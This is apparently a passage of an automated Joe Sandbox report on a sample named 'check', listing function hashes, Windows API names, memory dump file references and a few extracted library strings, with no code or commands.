                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                • Instruction ID: 990f0cc978b6516c064a14d5dce19048266226d6ec78d43fff7d5af4d10314f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F852E572A186A68BD7A48F14C458B7E3BA9FB49344F218179E64AC7790DF3CEC54CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                • Instruction ID: 8a7553124230d87134906ffe12b79df0548b50833020fe6deaeb75088c3fd3c5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17313072608B8186EB609F60E8807EE7364FB8974CF54847ADA4E87BA5DF3CD549C710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                • Instruction ID: 1f4018839b3411a95f01c0a7d63c2fc1c6005d7ca18ce5c48bed2bc38af0c5e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0131A432618B8186DB20CF24E8406AE33A4FB8975CF644135EA8EC3B64EF3CD556CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                • Instruction ID: bc37af6628e9673aab36c14b2d942a305566871629f442e38d7429f3be928234
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BB1D722B1869251EA60DB21D5102B96761EF48BECF64C171DE5FE7BE9EF3CE4918300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                • Instruction ID: 095c256708aaa9e0c224ca78ba7e1fc4078f3108a03917a4d1cf9ffce9ec1e05
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14111822B18B05CAEB008F70E8542AA33A4FB5D75CF540E31EA6EC67A4DF78E1558340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction ID: a02971bc239dd208e9ae53412cf0318a265ecc1d847546e4759bd39e92674c9a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04C1E172B1968687E7248F19A0446AAB7A1F798B8CF60C135DB5BC3794DF3DE801CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                • Instruction ID: 1047fc64607114d9851876cd1cec60681c2932b3f14f33b36c1e64a60aeacd8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7F19772A183D54BE7A58F15C088B3A3BA9FF4A748F258574DA4AC73A0DF38E951C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                • Instruction ID: 0ede02566c488e90b41854948f0b1491a70a3ee056ef47201a5867fa0f9da9cf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8B12873A04B898AEB15CF29C84636937A0F788B8CF24C961DA5EC77A8CF39D451C700
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                • Instruction ID: 8a2f0676fb4d40173f0f8da2f9610ff05ffd01e5205b964f8f87d44cf28bb9b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8E17032A0864685EB688E29A15013937A0EF49F4CF349275DA6FC77B4EF2DE851C74C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                • Instruction ID: 59d9648349596f0abfb2670f5f21162bb1cb331fc55589738f7320a65dfbd067
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C919A72A182C58BEBA48B15C449B3E3B99FF49358F218175DA4BC67A4DF38ED50CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                • Instruction ID: 14cc8ba976f019944c67dd0df359d48dbfeadb43cb87402d684e7d3e1211a4f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A517863B183C186E7258F35A8407696B91E748F98F68C2B1CB99C7BE5EF3ED4458700
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                • Instruction ID: f3e8153eaf4ca2b2764f33f81fe0a08aa5ab354ebaf5c08afeb4530298de56f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA15662A187C986EB21CF25A4007A97B91EB59B88F25C071DE8EC77E5EE3DE501C701
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                • Instruction ID: 7f0008afe0fb55b9488924a602f8c541d65d05bbcf7f7f6f36842148f42ebadc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28518E11B1860251FA64AB2659211BA52906F8DFDCF78C4B4EE4FD77BAFE3CE4528340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                • Instruction ID: 48b37e88ee2da4e12ce20e059d8edf6c55e3528336ae44067a9b4de48a294857
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDB09220E0BA02C2EA092B256C8262923A5BF4C708FA881B8C11EC0330DF2C20E65700
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                • Instruction ID: 4ba1089dff142e87311199c47a04e503f868a2eb70441d78d9e54b2687e02d56
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D1A662A0864285EB688A25A15027D27A0EB09F4CF3482B5CE2FC77F5EF3DD945C74C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                • Instruction ID: fdd58e814e1c5cec4767313f51184cda50198a22c594371864c01be6c5659faa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12C19F762181E08BD289EB29E47947A73D1F78934DB95806BEF87877C5CB3CA414DB10
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                • Instruction ID: cdb559bc4e703586755bde5b0c8bbd6ce11fe9283018e4f7dc1831011cf9cb26
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FB14A72A08A8585EB659F29C05027C3BA0EB49F4CF3881B5CA4FC73A5EF39D445D784
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
